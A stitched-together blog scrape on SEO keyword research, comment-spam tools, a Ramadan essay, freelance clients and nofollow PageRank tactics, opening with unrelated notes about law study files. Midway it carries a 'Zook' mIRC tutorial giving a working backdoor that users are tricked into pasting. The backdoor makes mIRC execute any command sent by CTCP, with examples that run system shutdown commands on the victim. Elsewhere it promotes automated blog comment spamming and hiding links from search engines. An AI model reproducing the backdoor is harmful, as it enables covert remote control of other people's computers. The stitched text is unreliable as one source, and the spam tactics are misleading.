The Documents Fit into 4 main categories:

The ones in the base folder are my own notes on the whole of a topic.

The ones in the ‘Redundant’ folder, are older version of my notes (may be useful as I cut bits out in the later versions).

The checklists are ofc checklists on the main areas, these include flowcharts stautue breakdowns, key point to look out for etc.

The ‘Other ppl’ folder are notes I got from other people, which may be useful as they have a different style to me in writing and explaining.

I hope these notes help your efforts, please note though that due to the way law works there are bound to be changes in it since I wrote these, key one to note the companies act.

So I suggest you go through the notes and amend them so they become your own, this will help you learn and update the bits that are required.

Niches come in as many flavours as Ben and Jerrys ice-cream. Macro/Micro/Super Micro Niches even all require good research for you to find that traffic and ultimately sales driving traffic.

Picking the right keyword

Picking the niche

Now normally we pick a ‘theme’ keyword before we actually pick a niche keyword. A example of a theme keyword being ‘Saxophone’ and a niche being ‘Tenor Saxophone’.

However in the example I will be working with today I am basing it on a product namely this and therefore our main keyword is already picked for us, namely ‘Mafia Wars’

Finding a Micro Niche

Now I am no wordsmith and so I will only define a Micro Niche as a ‘niche within a niche’. So in the ‘Tenor Saxophone’ niche a possible micro niche could be ‘Tenor Saxophone Playing Guide’ etc etc.

So what we do with Market Samurai is fire it up and type in ‘Mafia Wars’ as the main keyword and we’ll eventually get here:

You will note that I have ticked both ‘Google Synonym tool’ and ‘Google search keywords’. This is to get as many keywords as possible from Google that IT thinks is related to Mafia Wars and hopefully some of those juicy ‘Long Tail’ keywords everyone talks about.

You will also note that I have also elected to display traffic that has a minimum SEO traffic of 50, this is because we dont want to get / work for keywords that look great but don’t actually have any traffic.

Filtering Keywords

Manual Review:

While Google is great is spitting out keywords it doesn’t always get the niche spot on. So some time times we have to manually go though it all and filter out some of the obviously unrelated keywords.

Filters ON!

We want to now set a minimum ’standard’ and set up the filters so it would only require targeted content and some links to get in to the top 10.

What I set the filters to above was:
- Search Traffic min: 50
- PBR (Phrase to Broad Ratio): 10
- SEOC (SEO Comp): 100k
-SETOC (SEO Title Comp) : 10k

I had also set the match type to ‘exact’ however you can have it set to ‘broad’ to see further keywords that will show up with amendments. An example being ‘Mafia Wars Items’ which fit the broad criteria but not exact. What this meant in effect was that not a lot of searches come for ‘Mafia Wars items’ itself however those three words were in larger phrases such as ‘Mafia wars items cuba’ or used in longer search strings etc etc.

However keeping it simple and running with the ‘exact’ filter there was only one keyword left, namely ‘Mafia Wars Collections’ which promises a nice 95 searches a day and not a lot of competition at all.

The final hurdle

All that is required now is to plonk that keyword in a post permalink and make it the post title (or a domain name) and write some relevant content and throw links at it. You should be ranking and making money in no time!

Results

Well I threw a few links at the post I wrote and …:

That is the amount of hits it has got from SE’s today and there are still about 12 hours left in the day!

Sales wise its been doing about 1 a week on the click bank account I opened for this experiment. Which considering all I have done is plonk a small line and picture at the bottom of the post I think is pretty good.

So this keyword research that took me just over 10mins to do added with another maybe 30mins writing researching and throwing some links at it is now making me a sweet $100+ a month. This is with it being no 4 for the keyword and no blatant push for the book. If I had set up its own domain with the main keyword in the domain (Mafia Wars) I would be able to capitalise on this by writing on those other keywords and making that $100 in to a bit more!

Note I used the paid version of MS for this guide however you can grab a free trial from here and remember the keyword module is ALWAYS free so just grab it

This is a very simple trick I picked up that has saved me A LOT of time when doing research that has required multiple csv files.

Basically what the little snippet does is make all the .csv files in a said folder merge into one nice big .csv file. Making analysis THAT much easier.

The Code for a Batch File

Open up notepad or your equivalent and add the following:

copy *.csv importfile.csv

Then just save the file as a ‘.bat’ and when you need to use it just drag it into the folder and double click, and it will create a file called ‘importfile.csv’ which will be the new merged csv file.

Download

Now some of you might not want to wonder into notepad etc and copy and paste a line!!!! for those of you the download link is below!

Merge Multiple CSV Bat File Download

Nice and simple :p

Alternate Method to merge csv files

Some of you might not trust batch files (its alright I have my doubts on what they do at night as well). So here is a different method with video!!!

1) Choose Start->Run
2) Enter “cmd”
3) Enter the following:

copy C:*.csv C:[filname].csv

…replacing the path and filename with your own information.

4) Hit the enter key.

Source

So remember dont waste money on those programs!!! do it yourself! :p

Now my Blog Comment Demon Review that I did a little while ago was received I suppose as any negative review is received. Some people said ‘I agree’ and the fan boys said ‘your an idiot’.

Though I still stand by my review; it did not work as I expected it to. However on my rounds on the interwebs I found a tool that promised the same things, had a few more functions and best of all was FREE so all of you out there could try it on without spending a dime!

So without further ado I Introduce you to Free Blog Commeter 3.0

Blog Comment Demon vs Free Blog Commenter

Now the positive things I said about BCD was:

It has proxy support which always nice.

You can ‘use’ a useragent thus making the program look like firefox.

Finds Blogs/Page PR accurately…

Multiple project / keywords support

Can ‘position’ internal windows to how you want.

So how does this match up with our new toy?

Well it too has:

Proxy Support

Interchangeable Useragent support

multiple Project support

Accurate PR checking

However there are a few difference; for one the PR checking seems to be a bit buggy; though that is just in the display of the PR (it displays ‘-’ in front of some numbers), and the project support requires you to save ‘.xml’ files for each project which are then loaded up. Meaning its not a selectable function as was in BCD.

The Comment Search Function

Now my biggest gripe with BCD was it was SLOOOOOOW and oh so slow it was. This in comparison is that Ferrari against your Moped. It can leave three hours later and still get to the end of the drag race before you!

The added bonus with the search function with the Free Blog Commenter is that unlike BCD it is not limited to just Do-follow/ or No-follow but can search for sites with keyword luv / comment luv and top commentator as well.

Add this to the fact that the number of keywords you can search for (up to 10 different keywords) and xxxx number of results, your potential commenting ground is HUGE.

The only ‘bottleneck’ speed wise is the PR scan of the urls; how ever as this voluntary it can be avoided.

Now with BCD one complaint I had was irrelevant search results; this however worked a lot better (i’m assuming it used an api)…so that was nice

Comment right HERE

For BCD you just selected the url and it auto filled the form from the information you had provided and off you went.

For this tool it works more or less the same; you can define multiple ‘names’, emails, urls and even comments if you want to to a quick flyby commenting spree. The added bonus being for sites that have keyword luv it automatically adds a name before your keyword. i.e. joe@keyword etc. This I thought was pretty cool.

Now most of the comments I left when testing this were instantly approved however if they were not going to be I would have really appreciated the comment tracking feature of BCD.

The Dark Side of the Moon

Now no program is perfect… but it can get close and this did however some negative points I found were:

Lack of comment tracking if delayed approval.

Program freezes under huge load (though given time it recovers).

No inbuilt comment profile saving mechanism relies on saving it on external xml.

Comment site region selection sometimes inaccurate. (though this may be a Google thing).

No post comment number filtering.

Doesn’t show multiple platforms (ie sites that are keyword and comment luv etc)

Some times posts are rendered blank.

Conclusion

Well this program is FREE it finds relevant Keyword/Comment Luv / Do-follow/ Top commenter urls to comment on. It is super fast so finding and commenting on say 20 sites will not take more then 30mins.

The negative points I have made with the exception of the last are just small tweaks and ‘dream’ features that would make this tool a even better one.

Would I use this in my SEO efforts? Yes
Would I recommend this? Yes very easily
Is it better then BCD? Yes, it has more functionality, it beats BCD’s flaws and is free

So I would say grab the program from their site or if you dont want to sign up to their newsletter you can Grab it from me.

4/5 A Awesome tool does what it says and just needs some polishing.

I’ll leave you with the most interesting song video I have seen for a while:

Now as every Internet Marketer knows there are certain tools that makes your life easier. These tools normally fit in to three main categories namely:

- Niche Research
- Link Acquistions
- Content Creation

And all of these three have an abundance of tools an IM can pick, though of the tools there are only a select few that are useful and these tools normally have an HEFTY price tag attached and to justify this price tag there is always the promise for free updates for life and every increasing uses for the software.

Though what if you fork over $150 or even $40 and the product creator ‘forks’ you over? what method have you got for recompense?

Well let me vent some anger my naming and shaming…I know its not a good tactic but yes.

Shameful Marketer: Mr Brad Callen

You may have heard about his new product Keyword Elite 2. Now this product may be good and not just hype however; after being spammed by a dozen or so emails selling this product even though I had already brought Keyword (and SEO) Elite a year or so ago I did not get the free update promised.

SEO elite is more more or less a defunct piece of software, though I’m not to fussed as I use Market Samurai in its stead now, and KE v1.0; while yes it still functions though I was promised FREE UPDATES FOR LIFE when I forked out the $197 or so for it when I got it so I expect to get free updates NOT being told to fork out another $200 to get KE 2.0 which SHOULD have been a FREE UPDATE as was promised.

Shameful Marketer: Nathan Ridley

Now he is the genius behind Traffic Android; and as you can see by my earlier review of it I loved this program; It helped automate small tasks that were vital for anyone who new a little about SEO.

However come August the online version of the software died out due to lack of updates and stopped working and V3.0 hasn’t even started to be worked on yet! So now its a piece of nothing that does nothing…oh fun!

Luckily I haven’t come across any other products that have ‘died’ on me… How about you guys have you had any experience with any ‘Shameful Marketers’ ?

With Ramadan Started now (two days in) I have been forwarded a number of enlightening material. This however I think it is a useful insight of the period of fasting, whether you are Muslim or not, and as the motto of The Nexus is ‘Feed your Brain’ …then here is some food for thought

The evening prayer has attracted a larger than usual number of worshippers. Today, the advent of the new moon might herald the start of the holy month of Ramadan – the Muslim month of fasting. In an effort to observe the Sunnah of the Muhammad (PBUH), some worshippers are busy trying to sight the new moon when the call to prayer is made. After the prayer, the Imam is informed that the new moon has been sighted. Members of the council also confirm this news. This prompts worshippers to congratulate each other and the mosque is filled with the chants of Allahu Akbar (God is great).

For this group the holy month of Ramadan has begun. Yet Muslims in many other mosques are still debating whether or not the new moon has been sighted. Sunni Muslims generally look to Saudi Arabia for answers to this, as well as many other religious matters. Although ISNA (Islamic Society of North America) has established for North American Muslims, a Shura (or consultation) council for dealing with controversial religious issues (such as moon sighting), many Imams in local mosques decide such matters on their own.

Year after year, this story is repeated among Muslims in many towns around the world. This pillar of Islam begins with controversy among Muslims and ends with controversy. Shi‘as have their own clerical system and their Imams look to Iran in this matter rather than Saudi Arabia.

One wonders if this is the way our messenger Muhammad (PBUH) and his companions started and ended the holy month of Ramadan.

Ramadan Begins

In any case, within a day or two of each other, the holy month of Ramadan generally begins for every (Sunni as well as Shi‘a) Muslim community around the world. The standard sermon for Ramadan goes something like this:

“Dear brothers and sisters! Allah Almighty open’s the gate of Heaven in this month. Satan is locked up in Hell so he cannot mislead those who are fasting. The reward for good deeds is multiplied 10 times in this month. Allah Almighty becomes very generous in this month and forgives the previous sins of those who fast.” And so on.

Obective of Fasting

Is fasting just about having sins forgiven and getting rewards multiplied in the Hereafter? What about the problems of life here in this world? Is fasting just a ritual or does it have some other significance?

Modern Islamic scholars draw attention to the physical and spiritual benefits of fasting. But since physical and medical benefits of fasting accrue to anyone who fasts, regardless of one’s faith in God, it is obvious that the physical and medical benefits are not the primary purpose of fasting in Islam.

What about spiritual benefits? Since different religions have different concepts of spirituality, what does spirituality mean in Islam and how can it be developed through fasting? The proponents of other religions, including many Muslims, claim that spirituality is an individual and subjective experience. How then can one know that one’s spiritual development is taking place due to fasting? In addition, would a Hindu’s or a Buddhist’s spiritual development, due to fasting, be as significant as a Muslim’s? In fact, Buddhist monks and Hindu saints go through much more rigorous rituals than Muslims. Does this mean that their spiritual development is of a higher level? Obviously, no Islamic scholar would be prepared to accept this.

According to the Quran, every Muslim (who can) must fast in the month of Ramadan 2:183-185. And fasting has to be done collectively at the community level. Unlike a Buddhist monk or a Hindu saint, a Muslim does not have to go to a mountain or a forest retreat to develop their spirituality through fasting and prayer. Moreover, it is not necessary for this type of retreat-based, solitary spiritual development to be done in Ramadan. That can be done in any month. This shows that a Muslim cannot advocate a spirituality that is based on individual and subjective experience. Therefore, in Islam, individual and subjective spiritual development is not the purpose of fasting in the month of Ramadan.

Since the Quran prescribed fasting specifically in the month of Ramadan, it is important to know the significance of this special time. A special feature of the Quran is that whenever it gives a command for action, it also provides the wisdom behind it. It tells what the final result of that action will be in this world, if it is successfully carried out. In this way the Quran provides a pragmatic test for people to see whether or not they are moving toward that desired result. Regarding fasting, the Quran says:

O ye who believe! Fasting is prescribed to you as it was prescribed to those before you, that ye may (learn) self-restraint . [al-Baqarah 2:183] Translation: Yusuf Ali

Ramadan is the (month) in which was sent down the Qur’an, as a guide to mankind, also clear (Signs) for guidance and judgment (Between right and wrong). So every one of you who is present (at his home) during that month should spend it in fasting, but if any one is ill, or on a journey, the prescribed period (Should be made up) by days later. God intends every facility for you; He does not want to put you to difficulties. (He wants you) to complete the prescribed period, and to glorify Him in that He has guided you; and perchance ye shall be grateful . [al-Baqarah 2:185] Translation: Yusuf Ali

In the above verses, three results of fasting in Ramadan have been mentioned:

1) Taqwaa : learning self-restraint

2) Takbir : glorifying Allah Almighty because of being guided

3) Shukra : being grateful .

Part 1 of this article will focus on Taqwaa or self-restraint.

What is Taqwaa

In the above translation by Yusuf Ali, Taqwaa has been translated as self-restraint. Other translations include: God-fearing or God-conscious. But none of these translations bring out the true root meaning of Taqwaa . The root of Taqwaa means to steadfastly remain vigilant in practicing Allah Almighty commands and, because of this, to be protected from all kinds of evil, dengnerated actions, and destructive forces. In other words, the cornerstone of Taqwaa is developing a strong character by following the principles laid down by Allah Almighty in the Quran. A person who has developed such a character and which is reflected in his/her actions is a Muttaqi in the eyes of God (Allah) Almighty .

Current Misconceptions Among Muslims;

Many Muslims today who claim to fear God or to be God- conscious firmly believe that they are among the Muttaqoon based on their performance of certain rituals. According to this belief, which of the following category of Muslims would qualify to be Muttaqoon ?

1. Would the rich, who pray regularly, fast the entire month of Ramadan, give’s two and half percent charity (Zakah) from their wealth, and perform pilgrimage ( Hajj or Umra ) on a regular basis qualify as Muttaqoon ?

2. Would the current, so-called Muslim governments and the Muslims working for them qualify to be among the Muttaqoon ?

3. Would Islamic scholars and leaders of various religious parties and their followers who demand governments to implement the so-called Shariah qualify?

4. Would professionals like doctors, engineers, professors, lawyers, etc. – who initially work very hard to build and establish their careers and later turn to Islamic activities on a voluntary basis – qualify?

5. Would Sufis who spend most of their adult life in zikr (remembrance) of Allah Almighty in mosques or in solitary confinements, unconcerned with what goes on in the world outside, qualify as Muttaqoon?

6. Would those who leave behind the poor, the orphans, and the widows in their own communities and go to far-off places, for several months at a time, inviting people to Islam, qualify?

7. Would the professional Imams (maulvi) who lead prayers in mosques and give sermons about Islam qualify as Muttaqoon ?

8. Would the poor, who pray regularly and fast the entire month of Ramadan but cannot afford to perform the pilgrimage, qualify to be Muttaqi ?

9. Would the millions of average Muslims who struggle all their lives to meet the basic needs of their families and who try to pray and fast but do not have the time or resources for anything else, qualify to be Muttaqi?

How many of the 1.2 billion or so Muslims fall into categories 1-7 and how many into categories 8-9? No doubt, 99% of Muslims fall into the latter. Will they be excluded from being Muttaqoon because they cannot perform all the five pillars? Or, should we say that all Muslims are Muttaqoon ? No controversy, no discussion, no problem? Every Muslim, by virtue of being Muslim, is bound for Heaven anyway, sooner or later.

Quranic Definition of Muttaqoon

A very comprehensive definition of Muttaqoon is given in the following verse:

It is not righteousness that ye turn your faces Towards east or West; but it is righteousness- to believe in God and the Last Day, and the Angels, and the Book, and the Messengers; to spend of your substance, out of love for Him, for your kin, for orphans, for the needy, for the wayfarer, for those who ask, and for the ransom of slaves; to be steadfast in prayer, and practice regular charity; to fulfil the contracts which ye have made; and to be firm and patient, in pain (or suffering) and adversity, and throughout all periods of panic. Such are the people of truth, the God-fearing ( muttaqoon ). [al-Baqarah 2:177, Translation: Yusuf Ali]

This verse puts in perspective the ritual-based Islam that we practice versus the substance and goal-based Islam, which the Messenger Muhammad (PBUH) and the Sahaba (R) practiced. Proponents of the ritual-based Islam would have us believe that once the rituals are done properly, meticulously, and sincerely we are guaranteed salvation in the hereafter. The Quran clearly rejects this view of Islam in this verse. The Quran says that these people are misguided, have fabricated a Shariah, and have mixed it with the Book of Allah Almighty and which they proclaim to be Divine (2: 176 – 177).

According to verse 2:177, the essential purpose of Islam is not fulfilled by a mechanical performance of rituals, e.g., turning eastward or westward during prayer, but requires instead:

1. 100% conviction, Iman, in Allah Almighty ; in the law of requital; in the life hereafter; in the forces created by God Almighty for our benefit, Malaa-ikaa; in all the Messengers of God (PBUT); and in all the Books revealed to them; and

2. The establishment of a system in which resources are made available to help those who (a) are left without protection or support in society; (b) lose their means of livelihood or are incapacitated to work; and (c) cannot earn enough to meet their needs. This system will also provide assistance to those outsiders, who, while passing through its territory, become indigent, as well as arrange for the liberation of slaves from bondage.

According to this verse, Muslims are required to establish a system wherein members of the society adhere to the Divine code of life voluntarily – this is a requirement of Iman -and the means of development are provided to all who need them. Muslims must honor their promises and commitments. If hostile forces confront them, they must face them with steadfastness and fortitude, and must not let fear and despair weaken them.

Only those who follow this path unswervingly can claim to be true believers and they only can rightfully claim to be Muttaqoon.

The following verses further describe the character of the Muttaqoon . [Translation by Yusuf Ali]

Al-Imran 3:76 Nay – Those that keep their plighted faith and act aright,-verily God loves those who act aright ( muttaqeen ).

Al-Anfal 8:56 They are those with whom thou didst make a covenant, but they break their covenant every time, and they have not the fear (of God) [ la-yattaqoon meaning these people are NOT Muttaqoon ].

Az-Zumar 39:33 And he who brings the Truth and he who confirms (and supports) it – such are the men who do right ( muttaqoon ).

Al-Maidah 5:8 O ye who believe! Stand out firmly for God, as witnesses to fair dealing, and let not the hatred of others to you make you swerve to wrong and depart from justice. Be just: that is next to piety ( taqwaa ): and fear ( wattaqoo ) God. For God is well acquainted with all that ye do.

Al-Imran 3:133 Be quick in the race for forgiveness from your Lord, and for a Garden whose width is that (of the whole) of the heavens and of the earth, prepared for the righteous ( muttaqeen ).

Al-Imran 3:134 Those who spend (freely), whether in prosperity, or in adversity; who restrain anger, and pardon (all) men – for God loves those who do good.

Conclusion
Fasting is a means to becoming Muttaqi. No doubt, fasting has health and spiritual benefits, but we must never lose sight of the main goal of fasting. Ramadan provides an environment for our collective training and development of character. Muslims are required to emulate and display, year long, the qualities laid down by the above verses as a result of fasting in the month of Ramadan. Since character building is a hard, long, continuous process, Ramadan is repeated every year as a reminder and re-enforcer. We must judge our accomplishments by the standards laid down by the Quran.

We should not be under the false impression that our spiritual development is taking place while our life goes on as usual. We have to keep the life and works of the Messenger Muhammad (PBUH) and Sahaba (RA) before us to know whether or not we are among the Muttaqoon.

The Entrecard Bot has been on hold for a while now, mainly because I don’t use it any more. However before I stopped using it I revised the code once or twice (so a more refined version of Entrecard bot -the code within). The almost latest of which is on the current page.

However to the point I created a small script that would automatically move the widget tot he top of the fold (ie top of the page like below). SO though I would share it now.

Now there are two ways to do this:

Free Entrecard Above The Fold Addon:

All this requires is for you to have Firefox and for you to install it by clicking on the below link:

Entrecard Top Of Fold.

Then just visit any site with entrecard and it will auto send it above the fold and top right

Entrecard Above The Fold Greasemonkey Script

For this just insert the following script:

1

// @name          EntreCardTop
// @namespace     http://www.thenexus.tk/entrecard-addon
// @description Bring Entrecard drops to the top of the browser
// @include       http://*
// ==/UserScript==
var allIframes = document.getElementsByTagName("iframe");
var ECframe = null;

//Find EntreCard Frame
for (i = 0; i < allIframes.length; i++ )
{
	var srcStr = allIframes[i].src;
	if(srcStr.match("http://entrecard.com/static/amazon/widget") != null) {
		ECframe = allIframes[i];
		break;
	}
}

if (ECframe == null) {
	//alert("no entrecard");
} else {
	var oldStyle = ECframe.style.position;
	var oldTop = ECframe.style.top;
	var oldLeft = ECframe.style.left;

	//about to change
	ECframe.style.position = "fixed";
	ECframe.style.top = "0px";
	ECframe.style.left = "0px";
}

Warning!!!! This script DOES NOT play nice with Adgitize Dropping Script!

If you are clever you can code the script so to allow you to auto click and time delay etc but…yea to you I pass the baton!

mIRC Coding – Coding in a IRC Backdoor tutorial written by ‘Zook’s; This is for educational use only. Its main aim is to give an alternate method to users who have to control multiple computers over long distance, and that is the sole reason for creating an irc backdoor

Introduction to coding a mIRC script

OK, before we start this tutorial I’m going to say that a lot of people probably already know about this, but I still have met a lot of people who fall for this every time… And its Sad. Anyway this should work on any version of mIRC because all your doing is using your mIRC coding “Sk1llz” to the advantage of yourself.

Note: I take no responsibility for whatever you may do with the information of this tutorial… Blah Blah, lets get going.

Coding A IRC backdoor

Now lets break down the code line by line (Each line is separated by | which symbolizes a new line in the code)

Line 1: //me $list Game

This is just a /me Function to kind of point you into the direction of showing that the code has started to load, The only thing that really is different is the double /. This is basically showing mIRC that the following line will contain more then one item to execute/do.

Line 2: write -c x ctcp 1:*:?$1-

This code is basically writing “ctcp 1:*:?$1-” to the file “x” in the mIRC directory. What the CTCP Code does though is basically open a back-door in mIRC that waits for any CTCP message and whatever is in that message, mIRC is instructed to execute that command.

Line 3: /me number # -

This is basically your second signal that the code is being ran… And is basically a fall back for you.

Line 4: .load -rs x

This code is basically signifying that you want to load the file named “x” that is located in the mIRC Directory into the mIRC program, ultimately opening up the “back-door”

A few things to note, when the user runs the code it will show the two messages specified in the code so it should appear like this in the place the user executed the code.

-USER- Game

-USER- number #

That’s basically your “Notification” that they ran the code… Remember that you have to have two forward slashes at the beginning of the code, otherwise it wont run all the commands and will just look one giant /me of your code, which might set off other users to tell the person not to run the code.

Using the IRC backdoor

Now that you know the basic concept of the code, lets get to what you want… Commands to run. Well Basically your in luck, since mIRC is now “Back-door’d” your allowed to run any command that mIRC is allowed to run.

Examples:

/ctcp [USERINFECTED] /nick [AnyNick]

/ctcp [USERINFECTED] /mode [Channel] [Mode] [NICK]

/ctcp [USERINFECTED] /quit [Message Can Go Here]

Etc… Then it comes to one of mIRC’s “Special” Functions… this allows the user to run any command on the computer / do anything they want to a certain extent.

/ctcp [USERINFECTED] /run [COMMAND]

This could lead to something like:

/ctcp [USERINFECTED] /run rundll32 user.exe,exitwindows

or

/ctcp [USERINFECTED] /run shutdown -s -t 30 -c “System Error – Shutting Down”

Now how to unload the “Backdoor”, which is very basic. All you have to do is type:

/unload -rs x

Or if you want to be nice you can remove it from the person you “infected” by typing:

/ctcp [USERINFECTED] /unload -rs x

Note, that any command you execute on the person can be seen by the person if they look in the server window, and some scripts will actually show the CTCP in the channel that you/the user is currently talking in. So its not a discreet way of executing commands, I know, but if you can link all your commands to do what you want then the user shouldn’t have enough time to actually stop it. I hope you have learned something today, or if you already knew about this, then maybe I have opened you up to something you didn’t know before, or something that has enlightened you from reading this tutorial. Anyway have a nice day, and thanks for reading the tutorial.

-Zook

Well I can’t say its great to be back from holiday…as who can truly say they WANT to leave Dubai.

Though as always the blogosphere did not stand still and some great content has been out there. So here is a quick review of some posts I found very useful!

First came earth

Earth; the symbol of growth of life itself and its great to see that there are great people out there so firstly I would like to thank Jeff from Perishable Press for his great Guest post on the new no-follow drama that hit the SEO world (implications also considered at semoz) and would urge you to read up his follow up article on how you can utilize JS so to create external links making them invisible to Search Engines. I also suggest you preorder a new book he has co-authored you will not regret it!

I would also like to extend my thanks to Kim from (Anti) Social Development who graced these hollow walls with a great post and must read for people considering doing online freelance work and if you need any freelance work done give her a shout.

Then came Air

Michael Jackson

There has been a lot of hotair around the death of Michael Jackson and how it was a great loss. Yes I would admit his songs were great and as a musical genius he will be missed by the world. Though interestingly Mitch has found out Micheal Jackson death resulted in more online damage then 9/11 did!

Google themselves said:

“The spike in searches related to Michael Jackson was so big that Google News initially mistook it for an automated attack. As a result, for about 25 minutes yesterday, when some people searched Google News they saw a “We’re sorry” page before finding the articles they were looking for.” – Source

From a SEO point this was a truly … eye opening experience and I would urge you to have a look at semoz’s analysis of Jackson’s death.

Water flows both quick and slow

Speed Plugins

One downside of Dubai was that due to the content filter websites were ‘extra’ slow and therefore my site seemed waaaaay to slow to me so after a bit of digging I installed these plugins to help me out:

WP Optimize – What this does is optimize your database, it may not seem to do much but you see a difference in response time.

DB Cache – Now I dont use a caching plugin (they just seem to break this site!) however this seemed to work wonders; It reduced database calls from the front page from 47 to 22. That is a 50%+ benefit!! (I used debug-queries plugin to check…its also useful to find those bad sql queries). [If your having consistent high CPU issues I suggest you have a quick look at Michael Latest series]

Use Google Libraries – What this does is instead of loading JS such as jquery etc from your blog; it grabs it from googles CDN. So less resource usage on your end and most likely faster (as well as optimized).[Though be vary; some countries block google and therefore your site may be unusable if this situation occurs]

I aim to optimize the full structure of the blog DB/ Files and all soon; though it may not be soaring through the sky at the moment but its good enough for now :p

Speaking of speed also check out Rarst’s Firefox and Opera Test.

Fire – Burn that only which you can afford to do so

Making Money With Adsense

Now in parasite hosting post I mentioned Courts’ Hub page experiment; Well its good to see the results are now out and …money was made, how ever was it worth the effort? Week 4 figure shows that the hub pages made $165 (rounded up) so $165/100 = $1.65 per hub in the week so about $0.24 per day.

The trend was that the income about doubled every week. So going with this growth figure they should be making about $0.48 per day now, making about $15 a month each.

Now that is not a small amount but I wonder if it could be utilized further?

Forest Parks from Real Blogging tips has recently been blogging on his adsense case study to make $5 a day.

My point being if we could base 10 sites around the hub page content (10 hubs = 1 site) would it be more profitable? Could we add a ‘0′ to the end of the above figure?

Well as I argued in the post the reason these hubs are making money is due to the high authority nature of hub pages itself and therefore those posts and efforts if done on a site would not garner the same results. (Theoretically of course)

So if not that method; how far would it be possible to leverage those money making hubs as link building assets to a related niche site with a similar aim as Forests?

This would involve adding ‘author’ links etc such as in article directory linkbuilding. This would be unobtrusive and help your ‘main’ site rank. Thus enabling you to earn from (hopefully) The site at no1 position in serps and the hub page at no2 (and your other parasite pages at 3/4/5 etc).

This would be an interesting experiment to do… and I may just do it if time permits.

On that note I leave you for this week! Show that you are not selfish as Ajith suggest and leave a comment while enjoying a bit of Jackson!

When Donace first asked me to write a guest post my first question was, “Umm… when do you need it by?” Fortunately, he was super cool and gave me plenty of time. Of course, that still didn’t keep me from putting off writing it until almost the last minute. My second question was, “What do you want me to write about?” as I seriously had no idea what the topic should be. Donace suggested that since I had been freelancing for awhile now that I should write about the worst client that I’ve had. Honestly, I haven’t had any that were totally terrible but some have been difficult, rude and inconsiderate. So, instead I’m going to give you 10 reasons to not work with a freelance client.

The first email from the potential client says, “I need some help with my website. How much will it cost?” If you’re lucky there won’t be any typos. I still answer these but if I keep getting busier I will probably stop. Even once I explain that the cost is dependent on the amount of work they need and ask what they specifically need, they usually reply with, “Stuff is broken. I need it fixed ASAP. How much will it cost?”

The first email uses terms such as the above mentioned “ASAP” or “I needed this yesterday”. Well, if you needed it yesterday, you probably should have contacted me a minimum of two weeks ago. This individual is not going to become less difficult as you continue working together.

The client emails you numerous times before committing to the project or before any money has been exchanged. You begin to feel that your hourly rate has gone down to minimum wage. When you tell them you would be happy to discuss the project further at your consulting rates, you usually never hear from them again.

This one happens frequently on smaller projects that don’t require a more formal contract. You finalize the list of what needs to be done and then email them back with how long it will take and the cost. They reply back with, “oh and this and this need to be fixed too”. They then act all surprised when I tell them that will increase the cost.

They love the phone WAY too much. They want to call and talk to you before starting the project. Ok, fine. I can deal with that. But I do not need to make friends with you and talk to you for an HOUR.

The client will call you on a Sunday because of something really important like their adsense account has been approved. This actually happened and I dropped the client shortly after that. It wasn’t the only reason but was just too far. If you are going to call me on the weekends and especially on a Sunday it better be really really important. You know, something has exploded. But with the kind of work that I do there is nothing that can’t wait until Monday or be sent via email instead.

The client treats you like an idiot. I had a client who was having trouble with posts displaying properly in his featured carousel section. Initially when I tested it I couldn’t not duplicate the problem. He replied with “it’s important to follow my instructions and duplicate the steps exactly”. Umm … all you said was that it didn’t work. He also said, “why don’t you use one of your articles to test it or write new one”. What?!?!?!? No! Turns out that he wasn’t including an image with the post which, of course, is necessary for an IMAGE carousel to work properly. Who’s the idiot?

You have completed everything based on the specifications outlined in the contract and the client will not release the remainder of the funds until you answer “a couple of questions”. Ok, you answer the questions. Then there are a couple more, them more, etc. I haven’t determined the best way to deal with this. I’ve found that sitting on the questions for a week and then answering them very generically sometimes works. I swear the emails filled with questions take up more time than the actual project.

The client emails you every time something goes wrong with the site for months after the project has ended. I tend to think of myself as a mostly nice person so if it’s quick and easy I will answer it. But 70% of the time the client will NOT respond with a thank you. I’ve asked people for help before and it has been freely given so that’s fine. But I thank the person – sincerely and profusely.

The client loves you so much (probably because you are the only person who would put up with him) that he then sends all of his idiot friends your way. Then the cycle continues.

No one client has done all of these things. And, overall, so far my clients have been great. Some have become ongoing ones that I do work for weekly or monthly. They are kind, respectful, appreciative, and don’t mind paying for quality work. Part of the problem is me – I have to learn to be better at catching the bads one in the beginning and just saying no.

Anyone plugged into the Web these days has heard about how Google has supposedly changed the way it deals with nofollow attributes. According to a number of speculative reports, Google will no longer apply unused nofollow PageRank to other links on the page. So, let’s say that you have some sites that have been PageRank “sculpted” by way of strategically applied nofollow tags. For example, you may have nofollowed all of your comment, footer, or sidebar links. Ever since Google pushed nofollow down our throats back in 2005, their policy has been such that:

Nofollowed links are not followed

PageRank does not flow through nofollowed links

Incoming PageRank is allocated to all remaining dofollow links

With this policy, if your page has 100 links, and 50 of them are nofollow, all of the PageRank pouring into that page will go to the 50 dofollow links (i.e., links that are not nofollowed). Many PR-sculpted sites use this technique to funnel Rank to key pages, money pages, single posts, and so on. Instead of “wasting” link juice on unimportant pages, nofollow once enabled you to serve all of that tasty juice to your targeted links instead [1]. But not any more.

Now, with Google’s new nofollow policy, those 50 targeted dofollow links on your page will no longer get the extra juice leftover from the 50 nofollow links. Instead of re-allocating PageRank from nofollow links to dofollow links, your leftover juice just disappears! As far as I understand it at this time (at which Google has yet to clarify or explain their “new” nofollow policy), any juice saved from nofollow links is not re-applied to your money links, and it doesn’t stay with the page that contains the links either. It just vanishes.

So, if you have been using nofollow to retain some of your incoming rank juice and keep it on your money pages, forget about it. Google is changing the game. Got a post with tons of nofollow comment links? Goodbye PageRank. Got a sidebar full of superfluous internal links? Goodbye PageRank. You might as well make them all dofollow, because they are sucking the juice just the same and effectively pouring it right down the drain. I mean, this sucks, right?

Dealing with it.

For some of us with heavily sculpted sites, this is extremely bad news. Think your SEO clients will notice when their PageRank falls through the floor? What about when their money pages begin to choke? Fortunately, there are several ways to deal with Google’s new nofollow policy, although I’ll be the first to admit that most of them are pretty undesirable, especially where usability and accessibility are concerned. Nonetheless, if Google insists on changing the game halfway through, we should at least be knowledgeable of our alternatives. Let’s have a look..

External JavaScript
Currently, Google can read JavaScript that is included on the page, but it can’t touch JavaScript included via external files. By placing your link content in an external JavaScript file, you can rest assured that all of your PageRank will be delivered to the intended targets. This method may be a bit “dark-hat,” but we’re here to provide information, not judge. Here is a tutorial on how to dynamically insert links via external JavaScript.

iframes
I know, I know, “iframes” is a dirty word in most circles, but they can be very effective at preventing Google from seeing an entire sidebar full of inconsequential links or a few hundred comments for your single post pages. All of your bipedal, standards-compliant friends will mock you for using them, but for some, desperate times call for desperate measures.

WordPress comments
